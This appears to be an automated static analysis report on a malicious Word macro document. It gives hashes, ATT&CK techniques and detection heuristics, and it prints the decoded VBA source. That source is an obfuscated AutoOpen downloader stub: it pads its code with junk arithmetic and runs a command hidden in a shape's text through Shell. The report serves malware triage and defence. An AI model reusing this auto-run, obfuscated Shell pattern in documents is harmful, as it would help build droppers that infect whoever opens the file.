Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d7903bf49f6fbfea…

MALICIOUS

Office (OLE)

145.9 KB Created: 2018-12-06 13:30:00 Authoring application: Microsoft Office Word First seen: 2019-01-12
MD5: ad55100835675443607e0f7ef0e373e1 SHA-1: 99cd49d21f87631fa9e17ada342979e7b13c06e1 SHA-256: d7903bf49f6fbfea4015dbe25e3e5cabe84ae5ebfc5cd46ecb1e6982451b0c65
Risk Score: 292

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.001 PowerShell
  • T1059.003 Windows Command Shell
  • T1204.002 Malicious File

The sample contains VBA macros with an autoopen subroutine that executes a command. The command invokes cmd.exe with obfuscated arguments, most likely to download and execute a second-stage payload. The cmd.exe and PowerShell string heuristics, together with the `Shell()` call in the VBA, strongly suggest downloader or dropper functionality.

Heuristics (10)

  • ClamAV: Doc.Downloader.Generic-6775095-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6775095-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    uiBUVSz = Array(idGDO, WtQuYwhn, ViQjsXkFP, Interaction _
    .Shell(CSAZJvk, wscjbAitL), XCwmMmz)
       SFSYPwIRqmUfMzzw = 176977750 * CInt(64503016) + oJobFwIrcNzLwhfvEaN + CLng(301170968 + Sgn(CtQfKjZHMFBAEu) - 26345383 * 197223907) - MaHGfDqbWwjBtXNQZmPX + Chr(uRijQIwKumbRaNnmuWpaDois) * 39008609 / CStr(124564583) / (okiIoGiSIYWPvsQbMFkSJ / 172662247 / iPZzrFjpdzbJZQinLrvi / Fix(XHuinNWnVAYOHzsO + Hex(qMZjsRTirKiSZaN) + 315743360 + CBool(101954409 + IiPEsNCIzDvSRlY)))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub autoopen()
    ncVsVTHaT
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  8887 bytes
SHA-256: 7a97a190eb03e26e51363053bffae5e8dca2feccf7bb478488ee876f34b7be99
Detection
ClamAV: No threats found
Obfuscation or payload: likely
218 of 250 identifiers look randomly generated (e.g. 'fOHqDuKmpdCOkjLXUJcaWtmI') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "UvKqKRozCsGcrp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
ncVsVTHaT
End Sub

Attribute VB_Name = "zlcRziIlwY"
Function ncVsVTHaT()
On Error Resume Next
   OzSkrdObFrnwwIssEpjR = 45514226 * CInt(298815415) + uaSbUuSLKUswnVLJbBcs + CLng(242928576 + Sgn(SpCUVtlddWVUXKZCtjmjddF) - 63747085 * 31550037) - tfIPiAsAHcYzZZZhrV + Chr(TzAjZHwFEPojtPzzGVNs) * 138721771 / CStr(181926332) / (CwduHNGwmjjkYtviIh / 306658841 / kTtfjaaTLidIsawnwMpswT / Fix(AMfaGKmEKanmjD + Hex(KjmmkHGYszuImvsBpRQtSEzU) + 60447378 + CBool(167910243 + ShEoPjwCIGMjuuomcLC)))
   vkjLINiVRVnYIfKkvJDYcah = 125010518 * CInt(280413707) + CwwLwVjVNcFtPoQ + CLng(307150616 + Sgn(QOJLqEhAzNCRVDNU) - 19193102 * 73236067) - WFWRpmRhfCuPHhNQEhtMs + Chr(LBIjEsZrYMdiXHtzT) * 170240974 / CStr(161256259) / (BzDwujHmJnJwqFuVII / 219163755 / IodhlZKGWGNTnVQNzJm / Fix(lmhlDirSMYpLszOMTV + Hex(VZBPDZpKVohXwWLo) + 144046248 + CBool(45181206 + iHhrtwRCboHDtczQwjXiLNT)))
   jCczUGPhjCsadYbwRUSUA = 275601950 * CInt(5782118) + ZzJOaVjAKzQwLGqdftqcb + CLng(65906150 + Sgn(wBuBdrEjtBrXWwAHKVsQi) - 56342579 * 201294643) - LdooHzYJPPKNjUDJFSWvU + Chr(UhimjHjtDqWJpzCQZudiI) * 46032169 / CStr(250102843) / (apRiKMmjQdJHKVTRaVMUqW / 206415924 / HptbSlaNvrLqpA / Fix(rEntMpuFDbLImuRwEKNaV + Hex(KQiCwMTKdbZnVQDdT) + 93537167 + CBool(88949106 + pAGcnSduHfbZNYtWOJthm)))
   zOqAjjZadMLhijpiH = 258967966 * CInt(53298061) + jGWWJZnzDnUCPFihEBn + CLng(69059747 + Sgn(TzpUHzfkMbZEUfrsU) - 289329702 * 66906578) - aXqrJRYwIdGzzKPHjCCbHOqL + Chr(wvZqpkJdOpwIzKpYhciVZGJ) * 107471162 / CStr(239751116) / (RpioLjfwLVwHStzW / 231828153 / TwirMDalIpVrmJGdST / Fix(adPdBzTZZKoXDXowmdadiNa + Hex(pbTjpAobibJrEUhrtiB) + 176793883 + CBool(132574133 + STwMUArqQMDroZfjk)))
   OhdVmvLAnJIWlQlh = 228867848 * CInt(275954256) + wTzIFuKJrfUEccMCTfkhB + CLng(92683901 + Sgn(IShMmwVROdwftRYYab) - 250447455 * 128506808) - TFfuZOSCwIjkzpqYiX + Chr(WNFadwSkuGJFPuzp) * 85080677 / CStr(13876932) / (NhCPQUSvtciAsEYwH / 87724133 / BzGdXvoDQqCzdWQKfTwp / Fix(LBZIMGQBrzqbiAU + Hex(EfUbRBFrcFdcusc) + 59980146 + CBool(159360828 + qwjUKoYCZsLXuVvCboi)))
Set NtcOwsR = UvKqKRozCsGcrp.Shapes(ikAMzDXIz + "rruOGdOoNsmDO" + cjnjoKwo).TextFrame
   toQVhQBZrEzmnwuIzE = 200686599 * CInt(183687680) + hUEtTHYwiuwOElNYkvikimSh + CLng(277700078 + Sgn(OpTQWimZLTLbOIc) - 191220805 * 84352533) - BXiMjkMJwrSvCWDL + Chr(idOYTcfatMJhZIBZIjSZBIi) * 24911004 / CStr(81771799) / (uGPRoYDPtzwlivDmnYDcX / 229500016 / WuqllravKMkhYKcXk / Fix(JPBaWzWVOVJAjLMptWzn + Hex(XTEoZzOicLBTwNTPv) + 159148569 + CBool(298735367 + QdElKcYViQFZwMmvw)))
   kIdiaitzkZOqfLlkWdSYoso = 117107137 * CInt(111076975) + fJPJqSwlNzOzCXYUYFWzrO + CLng(135084472 + Sgn(YTjuGrTLRoCjia) - 230692193 * 318270433) - tzmVWbuAUUivTuQpOlXlDfW + Chr(DiOVolzWaFzRifBrmumX) * 239003435 / CStr(107858353) / (umuTpLKoObFRoMZMiWMUNwzG / 234561732 / fwJtzwmjUjtSILPRjqcNM / Fix(NiEAYvlzmnjFfMfUbJfF + Hex(pSPOAFwNIdWXAlbpwYrwWwF) + 228167651 + CBool(14959570 + DlOOTiHmXPomXppjiJNi)))
   aHDjOPStZntcrjWzUauJSaWR = 60722321 * CInt(82238729) + CGSAtfUzVGZjwhMUi + CLng(262792271 + Sgn(lwsYKGwfhAkmXBAPn) - 46799597 * 261338164) - zWmBtvuzbFFodqbQJiHtvzmw + Chr(TBiwSZNuoVOLriOMADcvv) * 56392140 / CStr(214394167) / (kFFzuDzkpPZtPBJfrup / 139641474 / ESDtjuvKApLVEMMU / Fix(AkYdVbFUwzuwDBTLN + Hex(nBGNJBZpZOYLpzLduEzj) + 229568975 + CBool(279069934 + YkvBOzorJqjYSImbWEjCrwlJ)))
   kzZTQNsiRklzibQLsUZcQ = 61166426 * CInt(178655430) + OwjJtlzOiChwvAjPpESwIDh + CLng(16605141 + Sgn(vihNCTaYfESdikjmXTjtU) - 104646983 * 290810013) - KmMqckLRjXwDQAciGYQvR + Chr(HTmLlkBIRfpwDPHkvvtBw) * 72578757 / CStr(252865808) / (WWqzmvzwUYftEQzbQYFS / 86380621 / zNbWcUCQowjIpOtDVV / Fix(tcijOjiwSkYFTQCZdWQT + Hex(uEjjMvbkhMCjnTrSdMqz) + 159080739 + CBool(239278439 + QqNrmoPhFCAzYuACkDLk)))
   dIwaPubEjKzWUHoXKTcDU = 282401574 * CInt(805435) + wPnszGzajqpAdTq + CLng(201237253 + Sgn(pvTrDIAijKEjnMmIr) - 182016097 * 341383169) - iFaKYndSotrczof + Chr(jOvGmOPwvrviCrlrqXjjVITQ) * 207885165 / CStr(227430623) / (pSblzhrcdjsUTqiPjrwPwI / 340725701 / ZHwaXvfbEYZdUGwzLPHLzD / Fix(trtnYjTtjToLrkRE + Hex(BRPvQAvauBDjBooWuDjiH) + 41042872 + CBool(307027704 + ftKfuEMuLZKfnScqzNifP)))
CSAZJvk = NtcOwsR.ContainingRange + iPXqQf + zpzhhaa + IVbiJica + ucPVSNf + GiMlz + qGrEAqGV + JCFzh + tjSHIzJL + UtwMoZP + jKwkcPA + fozlX + SwBAFwoz
   aaLziYhMkBSlOQIIE = 115862557 * CInt(129558669) + ZUiczihplTCwYoKRcTOnD + CLng(341651089 + Sgn(aYnSJzGaSzfpGviwErraRwV) - 89446797 * 170492937) - rflCjfZaEEMLYsf + Chr(jwswEVuUKwLYcbCZsCFboPR) * 342099788 / CStr(105447977) / (qdlsTzvXOWVbCVkQskTA / 328821561 / CmTVmDEThsiYiRjRcMdE / Fix(fEQzkqXXhjPhNazZ + Hex(MrTvpctiqThaHHXtQWhCVCMh) + 317217380 + CBool(1946161 + TrRqksfAllRqcXVu)))
   BdGtlOSSrIaNquO = 309421902 * CInt(266646865) + CRmwNHBwwLBfSmbwAccATF + CLng(102743501 + Sgn(GHPXlBjWiRjfWCQzsoR) - 43067274 * 110336855) - qomutlSoVzCKsFrd + Chr(ubiBAFwazMdHinJL) * 305140192 / CStr(108790538) / (lqHzEqwjcLKKHOdWimK / 278957633 / qTwZojrJtzzpQsUndaKEW / Fix(OmBVsBQiZjasvWLYPJ + Hex(ZjMNVrWIjBLAmLW) + 35434455 + CBool(65706626 + TnqtOaOPXzzbFLBzzjB)))
   VusOzSFjwXLrbCpvzOcwk = 35566909 * CInt(280253549) + LYQfIjithRmuwkcVWWVO + CLng(51307086 + Sgn(bnRDSnjzwPENDZBaXRsR) - 66306254 * 70710847) - vwOlHcNjbWjwdOEOr + Chr(hSXqlhDTvzEWpVQY) * 143761385 / CStr(50865406) / (BbWlfcrWcYLSDA / 53732684 / ssELhinjOfFjLjEszKq / Fix(LhrNtKavkjAVhsYjQwWSo + Hex(WzXKLwTTVsJaRKArRWIrwh) + 204075052 + CBool(234217038 + SHYbAoYtUKrqjzicRKILHbNf)))
   wGSUoJmLdSjJZbVBEITFRH = 261842397 * CInt(161902735) + sLujbRbwzBjKjhhOsjziVDz + CLng(316356192 + Sgn(nEQcWpSubwwriCBE) - 84075508 * 171922282) - oqYamrYYnqXpMwSnMLU + Chr(MNQEliXOjwdIdZHWPdik) * 325337762 / CStr(109571903) / (DEHmsMOotswNaaTpDUKr / 272773505 / OMmrvYjhjfviMAiw / Fix(BSJjQjMjwwoaQmZpppvz + Hex(QqFLIQRrNTLGqI) + 164380799 + CBool(207841533 + zfaKzcuGTtWtWKizclcE)))
   FBfJTjaPBtVboDcGAj = 147438361 * CInt(83439857) + NcQhnIsfJrPsvLaPV + CLng(190025953 + Sgn(uEfsMqpJMTBzku) - 34811894 * 295323610) - PbjahjrBGitsBqiDVSK + Chr(jDrzzjMIsizqSAAuwZNUo) * 283221564 / CStr(44882378) / (wQLcXvOcuLqLkjb / 7898004 / jIblCZApkGwEqsswjA / Fix(UjkwQVvGKoJNwMzEifWuq + Hex(nmpSXESzPAjsjnwL) + 72481360 + CBool(106184967 + TpAatwstoKRNGrJ)))
   zcfjORwPTCvDpzOXjVi = 246707003 * CInt(326350421) + RoiFjRzRKfUcYMiQ + CLng(77182211 + Sgn(YnEDtdjqpDqJjl) - 182565694 * 260664637) - rzJljSCrPiNbCoSK + Chr(MKEOvFVqbuaBviAkCrS) * 16708159 / CStr(123397696) / (UCLdvWPnOYzJZRiwvsnuFYb / 280219393 / zMqzzzHHUpCCRJzbnj / Fix(BmJjBGvaPYmwbU + Hex(wKYnQYsBEbjtijoT) + 114267076 + CBool(289818764 + phpcptCZsjitbhHNoDA)))
Const wscjbAitL = 0
   fOHqDuKmpdCOkjLXUJcaWtmI = 10867059 * CInt(128118882) + nSaIZwdwQVlNMcZj + CLng(168669206 + Sgn(hjRunczmAclcwojhXUOUcP) - 42964733 * 227347044) - CiwQwwNMTTjusfwLmwBMnWz + Chr(iEFRFMRdjzktBWCfYPiU) * 1915317 / CStr(258368993) / (pQJpRFVHjlSltrvHHBGL / 299996313 / FJQwVoXrcdraQBwWAYNrEHi / Fix(IocIWSucluKzZVjjjoJpt + Hex(buKlBizBpzainhMOVJ) + 230394333 + CBool(101449935 + VqwziojHQwsrpMiwlRLijF)))
   TXlUOtTTrAqrTALMG = 22976151 * CInt(228594843) + CwuVzPtSvIXPjqJ + CLng(244688943 + Sgn(CiilWZiiZfQajITADQUd) - 100613118 * 137237701) - zBXjcbLdrakDUAVfZPqajcrP + Chr(EOcaoHNhjijwqCDNBZAvFwzh) * 237659112 / CStr(310806275) / (YuOXKHjXMiCDSXWl / 121348056 / hjNnMiDqTuGOuqtuonULZr / Fix(irfzWiYiNhwDLzl + Hex(jUTnpRznMJYiiQHMpdjwh) + 230623503 + CBool(214942209 + vLthwnhuDGoqFDQ)))
uiBUVSz = Array(idGDO, WtQuYwhn, ViQjsXkFP, Interaction _
.Shell(CSAZJvk, wscjbAitL), XCwmMmz)
   SFSYPwIRqmUfMzzw = 176977750 * CInt(64503016) + oJobFwIrcNzLwhfvEaN + CLng(301170968 + Sgn(CtQfKjZHMFBAEu) - 26345383 * 197223907) - MaHGfDqbWwjBtXNQZmPX + Chr(uRijQIwKumbRaNnmuWpaDois) * 39008609 / CStr(124564583) / (okiIoGiSIYWPvsQbMFkSJ / 172662247 / iPZzrFjpdzbJZQinLrvi / Fix(XHuinNWnVAYOHzsO + Hex(qMZjsRTirKiSZaN) + 315743360 + CBool(101954409 + IiPEsNCIzDvSRlY)))
   wLqvdHpYBEHJBD = 43898073 * CInt(4620008) + CpznwUZIRwIwbsM + CLng(232659526 + Sgn(PqvqjvVCuIhfTcVPPtHh) - 109217405 * 4572427) - RmLIhaZMuaXnQERWtdlBLrd + Chr(WnjMzEBNPziEUmobUwmFwoEK) * 329101599 / CStr(151813215) / (EizfZJNmurNMqYJY / 110705975 / NBHoKjOFXBhiZOcqziQ / Fix(EuGAukHjwjmQojkVGP + Hex(SQUlMELRzkzbbIwWSu) + 45748773 + CBool(305812211 + ZfJrPRupdGjiNwDkJuv)))
   iOrCToQFtMUKJhFOvj = 337729079 * CInt(121384757) + XwKiWGGJKoNBiZMItHzwtna + CLng(189333851 + Sgn(NjiBlQMniLSjXwhJvjXGIaI) - 296278276 * 37361282) - YBUzjWhkIXcIZY + Chr(OEOtbWKQozEDVl) * 257476378 / CStr(179185581) / (vjrKSjbwznoJhmKwFuWuz / 196660489 / NljzfSLwVwqNphqvXmzc / Fix(WGGLuEPrQhmREiZmhvdnp + Hex(NqZURPwzHCBwqfZol) + 95042219 + CBool(314708117 + FPEvkDRJprTotEt)))
End Function